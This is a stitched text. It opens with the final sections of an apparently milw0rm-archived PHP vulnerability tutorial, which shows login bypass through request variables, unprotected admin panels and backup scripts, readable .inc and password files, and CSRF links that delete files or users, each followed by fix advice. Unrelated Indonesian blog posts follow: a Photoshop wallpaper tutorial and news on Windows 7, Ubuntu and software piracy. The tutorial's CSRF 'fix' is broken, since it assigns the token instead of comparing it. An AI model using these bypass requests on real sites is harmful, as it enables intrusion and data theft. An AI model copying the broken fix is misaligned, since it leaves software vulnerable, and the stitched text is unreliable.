     if ($logged==true) {
     echo 'Logged in.'; }
     else {
     print 'Not logged in.';
     }
     ?>
     ---------------------------------
     
      Here we need register_gloabals = on . I will talk about php.ini
    settings a bit later in this tutorial.If we set the value of $logged
    variable to 1 the if condition will be true and we are logged in.
      Example : 
   
     http://127.0.0.1/test/php?logged=1
   
      And we are logged in.
    
    
    11.1 - Via login variable
    
    
   - Code snippet from login.php
   
   ------------------------------------------------------------------------------------
   if ($login_ok)
   {
   $_SESSION['loggato'] = true;
   echo "<p>$txt_pass_ok</p>";
   echo"<div align='center'><a href='index.php'>$txt_view_entry</a> | 
   <a href='admin.php'>$txt_delete-$txt_edit</a> | <a href='install.php'>$txt_install
   </a></div>";
   }
   ------------------------------------------------------------------------------------
   
    Lets see.If the "login_ok" variable is TRUE ( 1 ) the script set us a SESSION who
         tell to the script that we are logged in.So lets set the "login_ok" variable to TRUE.
    Example : 
    
       http://127.0.0.1/login.php?login_ok=1
    
    Now we are logged in.
    
    
    11.2 - Unprotected Admin CP
    
    
           You couln't belive this but some PHP scrips don't protect the admin
    control panel : no login,no .htaccess,nothing.So we simply we go to 
    the admin panel directory and we take the control of the website.
     Example : 
     
        http://127.0.0.1/admin/files.php
     
   We accessed the admin panel with a simple request.
   
   
    11.3 - How to fix 
   
   
       - Login variable bypass : Use a REAL authentication system,don't check the
                            login like that,use SESSION verification.Example :
     
        if($_SESSION['logged']==1) {
     echo 'Logged in'; }
     else { echo 'Not logged in';
     }
    
    - Unprotected Admin CP : Use an authentication system or use .htaccess to
                            allow access from specific IP's or .htpasswd to 
          request an username and a password for admin CP.
          Example : 
          
    .htaccess : 
    
        order deny, allow
        deny from all
        allow from 127.0.0.1
    
    .htpasswd : 
     
        AuthUserFile /the/path/.htpasswd
        AuthType Basic
        AuthName "Admin CP"
        Require valid-user
     
     and /the/path/.htpasswd
     
     sirgod:$apr1$wSt1u...$6yvagxWk.Ai2bD6s6O9iQ.
     
     
  12) Insecure Permissions
  
  
      Tips : Look deep into the files,look if the script request to be
        logged in to do something,maybe the script don't request.
       Watch out for insecure permissions,maybe you can do admin
     things without login.
     
     
    12.0 - Basic example
    
       
    We are thinking at a script who let the admin to have a lookup in
   the users database through a file placed in /admin directory.That 
   file is named...hmmm : db_lookup.php.
   
    - Code snippet from admin/db_lookup.php
    
    --------------------------------------------
    <?php
    // Lookup in the database
    readfile('protected/usersdb.txt');
    ?>
    --------------------------------------------
    
     Lets think.We cannot access the "protected" directory because
    is .htaccess'ed.But look at this file,no logged-in check,nothing.
    So if we acces : 
    
      http://127.0.0.1/admin/db_lookup.php
   
    We can see the database.Remember,this is only an example created by 
   me,not a real one,you can find this kind of vulnerabilities in scripts.
   
   
    12.1 - Read the users/passwords
    
    
       Oh yeah,some coders are so stupid.They save the usernames and passwords
   in text files,UNPROTECTED.A simple example from a script : 
   
      http://127.0.0.1/userpwd.txt
   
    And we read the file,the usernames and passwords are there.

    
    12.2 - Download Backups
     

      Some scripts have database backup functions,some are safe,some are not safe.
   I will show you a real script example : 
   
    - Code snippet from /adminpanel/phpmydump.php
    
    --------------------------------------------------------------------------------
    function mysqlbackup($host,$dbname, $uid, $pwd, $structure_only, $crlf) {  
    $con=@mysql_connect("localhost",$uid, $pwd) or die("Could not connect");  
    $db=@mysql_select_db($dbname,$con) or die("Could not select db");
    .............................. etc ..........................
     mysqlbackup($host,$dbname,$uname,$upass,$structure_only,$crlf);
    --------------------------------------------------------------------------------
    
   After a lof of code the function is called.I don't pasted the entire code
    because is huge.I analyzed the script,no login required,no check,nothing.So
    if we access the file directly the download of the backup will start.Example : 
    
        http://127.0.0.1/adminpanel/phpmydump.php
     
     Now we have the database backup saved in our computer.
     
    
       12.3 - INC files
  
  
     Some scripts saves important data in INC files.Usually in INC files is PHP
    code containing database configuration.The INC files can be viewed in 
    browser even they contain PHP code.So a simple request will be enough to
    access and read the file.Example : 
    
        http://127.0.0.1/inc/mysql.inc
     
     Now we have the database connection details.Look deep in scripts,is more
    scripts who saves important data into INC files.
  
     
    12.4 - How to fix
                     
     
      - Basic example : Check if the admin is logged in,if not,redirect.
   
   - Read the users/passwords : Save the records in a MySQL database
                              or in a protected file/directory.
            
      - Download Backups : Check if the admin is logged in,if not,redirect.
   
   - INC files : Save the configuration in proper files,like .php or
              protect the directory with an .htaccess file.
       
  
  13) Cross Site Request Forgery
  
  
     - Tips : Through CSRF you can change the admin password,is not
         so inofensive.
        Can be used with XSS,redirected from XSS.
  
  
    13.0 - Basic example
    
       
     - Code snippet from test.php 
     
     -----------------------------------------
     <?php
     check_auth();
     if(isset($_GET['news']))
     { unlink('files/news'.$news.'.txt'); }
     else { 
     die('File not deleted'); }
     ?>
     -----------------------------------------
     
      In this example you will see what is CSRF and how it works.In the "files" 
     directory are saved the news written by the author.The news are saved like
     "news1.txt","news2.txt" etc. So the admin can delete the news.The news that
     he want to delete will be specified in "news" variable.If he want to delete
     the news1.txt the value of "news" will be "1".We cannot execute this without
     admin permissions,look,the script check if we are logged in.
      I will show you an example.If we request : 
   
      http://127.0.0.1/test.php?news=1
      
   The /news/news1.txt file will be deleted.The script directly delete the file
     without any notice.So we can use this to delete a file.All we need is to trick
     the admin to click our evil link and the file specified by us in the "news" 
     variable will be deleted.
     
     
    13.1 - Simple example
    
    
       In a way the codes below are included in the index.php file ,I
   will not paste all the includes,there are a lot.
    
           - Code snippet from includes/pages/admin.php

           --------------------------------------------------------------------
           if ($_GET['act'] == '') {
           include "includes/pages/admin/home.php";
           } else {
           include "includes/pages/admin/" . $_GET['act'] . ".php";
     --------------------------------------------------------------------
    
    Here we can see how the "includes/pages/admin/members.php" is included in
   this file.If "act=members" the file below will be included.
     
       
     - Code snippet from includes/pages/admin/members.php
     
     ----------------------------------------------------------------------------------------------
      if ($_GET['func'] == 'delete') {
      $del_id = $_GET['id'];
      $query2121 = "select ROLE from {$db_prefix}members WHERE ID='$del_id'";
      $result2121 = mysql_query($query2121) or die("delete.php - Error in query: $query2121");
      while ($results2121 = mysql_fetch_array($result2121)) {
      $their_role = $results2121['ROLE'];
     }
      if ($their_role != '1') {
           mysql_query("DELETE FROM {$db_prefix}members WHERE id='$del_id'") or die(mysql_error
           ()); 
     ----------------------------------------------------------------------------------------------
     
     We can see here that if "func=delete" will be called by URL,the script will
    delete from the database a user with the specified ID ( $id ) without any 
    confirmation.Example : 
    
      http://127.0.0.1/index.php?page=admin&act=members&func=delete&id=4
   
    The script check if the admin is logged in so if we trick the admin to click
   our evil link the user who have the specified ID in the database will be deleted
   without any confirmation.
       
 
    13.2 - How to fix 
    
    
       - Simple way : Use tokens.At each login,generate a random token and save it
                  in the session.Request the token in URL to do administrative 
      actions,if the token missing or is wrong,don't execute the
      action.I will show you only how to to check if the token 
                                                is present and is correct.Example :

         -------------------------------------------------------     
          <?php
          check_auth();
          if(isset($_GET['news']) && $token=$_SESSION['token'])
          { unlink('files/news'.$news.'.txt'); }
          else { 
          die('Error.'); }
          ?>
          -------------------------------------------------------
          
      The request will look like this one : 
      
          http://127.0.0.1/index.php?delete=1&token=[RANDOM_TOKEN]
          
      So this request will be fine,the news will be deleted.
          
   
    - Another way : Do some complicated confirmations or request a password
                   to do administrative actions.


         14) Shoutz

   
              Shoutz to all www.insecurity.ro & www.h4cky0u.org members.If you have some suggestions or 
            questions just email me.  

# milw0rm.com [2009-09-09]

Membuat Wallpaper Dian Sastro pake Efek Futuristik

noreply@blogger.com (Muhib Faisal) — Tue, 1 Dec 2009 08:14:00 -0800

Sebelumnya saya minta maaf kepada Mba Dian Sastro karena fotonya saya pinjem buat diedit.. hehehe.. gpp kan mba Dian ? kali aja Mba Dian Sastro lagi mampir disini.. hehehe.. Pede amat ya web ini dikunjungin Dian Sastrowardoyo..
Saya akan buat wallpaper Dian Sastro dengan efek futuristik.. hasilnya liat aja nanti deh ya.. di akhir acara.
Pertama buka dokumen baru, karena untuk wallpaper maka minimum ukurannya adalah 800×600 px dengan resolusi 300 pake 1024×768 px. Saya pake yang minim aja karena komputer saya lambat :D

Warnai Background dengan warna Hitam.
Buka gambar Dian Sastro lalu seleksi.. karena warna background nya putih.. pake Magic Wand Tool ajah.. selebihnya pake polygonal lasso tool.

Drag foto yang udah diseleksi ke dokumen baru tadi.

Gunakan eraser tool untuk merapihkan bagian pinggir gambar yang mungkin kurang rapi. Klik eraser tool, klik kanan di layar pilih soft round.

Buat garis Path seperti gambar di bawah dengan Pen Tool

Klik Brush Tool ( atau tekan tombol B), klik kanan di layar, pilih brush size 3. ini untuk membuat garis sesuai Path tadi.

Buat Layer baru ( Layer > New > layer ), Klik Direct Selection Tool, klik kanan di garis path > Stroke path

Delete path . Posisi tool masih di Direct Selection tool, Klik kanan padi garis path > Delete Path.
Tekan CTRL + J untuk mengcopy layer garis path tadi sebanyak 4 kali..
Klik Move Tool, geser satu persatu layer hasil duplikat tadi ke kiri atau kanan, dengan menggunakan Panah (kiri/kanan) di Keyboard.

Klik Layer paling atas, tekan CTRL + E untuk menggabungkan layer atas ke bawahnya, sebanyak 4 kali.

Tekan CTRL + J lagi untuk menduplikat layer gabungan tadi (layer 2), Klik Edit > transform > flip horizontal.. untuk membalikan gambar di layer copy tadi. ke bawah atau atas.

Klik layer paling atas.. Gabungkan lagi dengan menekan CTRL + E.

Sekarang hapus bagian yang kurang penting di layer 2 dengan menggunakan eraser tool

Buat layer baru di paling atas.. Warnai atas garis dengan aneka warna, sesuai selera..

Ubah layer efek menjadi COLOR. ..

dan perhatikan hasilnya, hapus bagian bawahnya dengan eraser tool, gunakan Soft Round supaya keliatan bergradasi.

Sekarang Buka gambar RENDER PACK, gambar-gambar render pack tinggal cari aja di google image.. tulis kata kunci RENDER PACK , atau bisa download render pack yang dibawah

( Klik untuk memperbesar , kalo udah besar disayang pacar klik kanan save image as )
Setelah file render pack kebuka di photoshop, seleksi sebagian , lalu DRAG ke dokumen Foto editan tadi.. Atur-atur letak nya.. di rotate (puter), resize ( perkecil/perbesar), hapus pinggir-pinggir nya dengan Eraser tool ( Soft Round) dan yang paling penting, simpen di bawah layer foto.!

Buat juga untuk bagian sisi yang laen dan bagian bawah.. untuk bagian bawah spesial berada di atas layer foto.

Hasilnya kayak gini :

Untuk membuat efek bening, buat layer baru, buat bentuk seperti dibawah dengan polygonal lasso tool,warnai dengan brush yang gede ( soft Round ) berwarna Putih dikit aja di bagian atas nya.

Hapus bagian yang agak mengganggu dengan eraser tool (Soft Round ), Kecilkan Opacity nya.

Dengan cara yang sama buat 2 lagi di atas nya
Hasil final nya:

Selamat mencoba..

Artikel Membuat Wallpaper Dian Sastro pake Efek Futuristik ini dipersembahkan oleh Tutorial Photoshop Gratis. Kunjungi Wallpaper, Font, Desktop Theme Gratis Pokoknya Serba Gratis. Baca Juga Kenali dan Kunjungi Objek Wisata di Pandeglang, untuk mengetahui lebih jauh tentang Pandeglang sebagai Objek Wisata yang patut diperhitungkan karena keindahannya.

Windows 7 Sistem Operasi Ribet & Kuno?

noreply@blogger.com (Muhib Faisal) — Tue, 27 Oct 2009 06:00:00 -0700

Windows 7 resmi dirilis Microsoft dan sudah dipasarkan di seluruh dunia. Namun bagi Apple sebagai salah satu saingan Microsoft, Windows 7 dianggap sebagai sistem operasi yang tak menarik, ribet dan kuno.

Kritik pedas tersebut dilontarkan Brian Croll, Vice President Mac OS X Worldwide Product Marketing. Dia mengklaim user Microsoft sudah lelah dengan Windows dan mungkin akan beralih memakai Mac.

"User Windows sangat lelah dengan semua sakit kepala yang mereka dapat bertahun-tahun dari Windows ME, NT, Vista dan sekarang Windows 7. Saya pikir orang mencari sesuatu yang berbeda, dan Mac menawarkan kemudahan pemakaian, stabilitas dan sekuriti," tukasnya.

Kritik tajamnya tak berhenti sampai di situ. Dia menyatakan Windows 7 tak mengalami banyak perubahan dibanding Windows terdahulu. Windows 7 juga dinilainya terlalu mahal dibanding apa yang ditawarkan dan berisiko soal sekuriti.

"Windows 7 dibuat dengan banyak teknologi kuno, yang tidak berubah dari rilis Windows sebelumnya," ucapnya. Ia pun memprediksi banyak user akan beralih ke Mac.

Akan tetapi sejauh ini, banyak anggapan Mac terlalu mahal jika dibanding PC berbasis Windows. Menanggapi soal ini Croll berkilah bahwa user tetap mendapat nilai lebih dengan membeli Mac.

Sementara itu, pihak Microsoft sendiri mengklaim Windows 7 adalah sistem operasi terbaik dalam sejarah mereka. "Windows 7 lebih dari sekadar kumpulan fitur baru. Ini adalah titik balik sangat penting dalam sejarah Microsoft," tandas Ashley Highfield, Eksekutif Senior Microsoft. (Telegraph/detik)

Ubuntu 9.10 Segera Hadir

noreply@blogger.com (Muhib Faisal) — Tue, 27 Oct 2009 05:57:00 -0700

Kehadiran sistem operasi Windows 7 yang diikuti ketersediaan PC dan laptop dari berbagai vendor komputer langsung dihadang sejumlah pesaing-pesaingnya. Jika menjelang peluncuran Apple dan IBM merilis penawaran baru, kini giliran Ubuntu yang siap meluncur ke pasaran.

Canonical selaku pengembang software Ubuntu, menyatakan bahwa Ubuntu 9.10 yang sebelumnya dikenal dengan kode Karmic Koala telah mencapai versi RC (Release Candidate). Artinya, software berbasis open source yang bebas dipakai siapa saja secara cuma-cuma itu selangkah lagi sampai versi final.

Berdasarkan informasi yang dirilis dalam web resminya, Ubuntu 9.10 versi final akan tersedia mulai 29 Oktober 2009. Sementara versi beta sampai saat ini bisa diunduh baik untuk server, desktop, maupun laptop.

Ubuntu 9.10 merupakan upgrade dari versi sebelumnya Ubuntu 9.04 yang dikenal dengan nama Jaunty Jackalope. Dibangun di atas kernel Linux 2.6.31.1, Ubuntu 9.10 diklaim memeiliki waktu booting lebih cepat, tampilan lebih menarik, dan tool pemrograman yang lebih mudah diadaptasi.

Versi Ubuntu yang disebut Karmic Koala selama pengembangan ini juga dilengkapi Ubuntu Software Center yang dapat menambah dan mengurangi program seperti fitur yang ada dalam Windows. Canonical juga menyertakan Ubuntu One, layanan sharing data dan penyimpanan online gratis 2 GB dan dapat ditambah 50 GB dengan biaya 10 dollar AS per bulan. (kompas)

Steve Ballmer: Windows 7 Sistem Operasi Terbaik

noreply@blogger.com (Muhib Faisal) — Tue, 27 Oct 2009 05:55:00 -0700

Windows 7 hadir dengan membawa segunung harapan. Tak hanya dari kalangan orang dalam Microsoft, selaku sang pembuat, namun juga bagi end user yang memanfaatkannya untuk kegiatan sehari-hari.

Harapan tersebut lumrah saja digantungkan, mengingat performa yang dihasilkan OS Microsoft sebelumnya -- Windows Vista -- selama ini bisa dikatakan kurang memuaskan, jika tak mau dibilang gagal.

Sejak kelahirannya di pasaran, sejumlah keluhan mendera Vista. Mulai dari dianggap memiliki spesifikasi yang berat, tak ramah untuk foto digital, hingga mendapat sambutan kurang ramah dari para pebisnis.

Untuk diketahui, spesifikasi minimal komputer untuk menjalankan Vista adalah harus memiliki prosesor 1 GHz, memori 1 GB dan hardisk berukuran 40 GB. Spesifikasi itulah yang dibutuhkan bagi end user untuk mengerjakan tugas-tugas rutin bisnis seperti memproses dokumen, menjalankan spreadsheet atau mengirimkan email.

Sementara di sisi lain, kebutuhan spesifikasi bagi Windows XP -- pendahulu Vista -- begitu kontras. Sistem operasi tersebut masih bisa dijalankan dengan prosesor 300 Mhz, memori 128 MB dan hardisk 1,5 GB.

Nah, melihat kebutuhan spesifikasi komputer tersebut itulah banyak kalangan bisnis merasa belum punya alasan yang cukup kuat untuk beralih ke Vista. Apalagi ketika sistem yang tersedia dirasa masih mampu memenuhi kebutuhan sistem pendukung tugas harian mereka.

Bahkan tak hanya dari sisi fitur, kekecewaan terhadap Vista juga datang dari para penjual PC yang menganggap OS ini tak mampu mendongkrak penjualan PC.

Hal itu ditegaskan melalui hasil riset lembaga analis Gartner, yang mengatakan bahwa kemunculan Vista ternyata hanya berkontribusi kecil terhadap angka penjualan komputer di 2007.

Melihat keadaan di atas, tak salah rasanya Windows 7 dinilai memiliki beban yang berat untuk mengembalikan kepercayaan pengguna sekaligus membayar 'kegagalan' sang kakak, Vista.

Dan hal ini pun coba diyakinkan CEO Microsoft Steve Ballmer yang menjanjikan pada pengguna maupun developer bahwa Windows 7 adalah OS terbaik dibandingkan sistem operasi Windows yang lain.

"Windows 7 adalah sistem operasi terbaik yang pernah kami buat," klaim Ballmer dalam surat yang dirilis oleh Microsoft.

Ya, itu kan klaim sepihak dari Ballmer. Toh, keputusan akhir yang bisa menentukan bahwa Windows 7 benar-benar memuaskan sejatinya datang dari kalangan pengguna. Menurut Anda? (InformationWeek/detik)

Windows 7 di China Dijual Cuma 30 Ribu Rupiah

noreply@blogger.com (Muhib Faisal) — Tue, 27 Oct 2009 05:54:00 -0700

Urusan bajak membajak, China boleh dibilang jagonya. Seminggu sebelum resmi dirilis, sistem operasi Windows 7 dari Microsoft sudah banyak dijajakan di negeri Tirai Bambu itu. Namun tentunya yang dijual di sana adalah versi abal-abal.

"Versi mana yang Anda ingini? Ultimate? Normal? bahasa Inggris atau China?," demikian tawaran dari seorang penjaga toko di Shanghai, sembari menunjukkan boks yang diklaim berisi Windows 7.

Masyarakat di China telah dapat membeli bajakan Windows 7 dengan harga amat miring, sekitar US$ 3 atau di kisaran Rp 30.000. Padahal Microsoft akan menjual Windows 7 dengan banderol ratusan dolar.

Aksi pembajakan software di China memang gila-gilaan dan memusingkan para produsen. Menurut biro riset IDC, 80 persen dari seluruh software yang dijual di China pada tahun 2008 adalah bajakan.

"Yang membuat pembajakan merajalela adalah soal harga. Jika Anda menjual program seharga 2000 yuan pada pelajar yang hanya punya 400 yuan per bulan, tentu ini tak akan bekerja," tukas Matthew Cheung, analis Gartner.

Microsoft sendiri sebenarnya sudah menjual software dengan harga miring, namun tetap saja masih kalah murah dibandingkan dengan versi bajakan. Otoritas China pun diharap makin serius memberantas pembajakan.

Business Software Alliance (BSA) memperkirakan, industri software merugi US$ 6,6 miliar pada tahun 2008 di China karena pembajakan. Namun kabar baiknya, diperkirakan tingkat pembajakan akan menurun seiring taraf hidup masyarakat yang meningkat dan kesadaran kalau membeli software bajakan berisiko besar.

Gartner memprediksi, level pembajakan di China daratan akan menurun serendahnya sampai 50 persen di tahun 2012. (New York Times/Detik)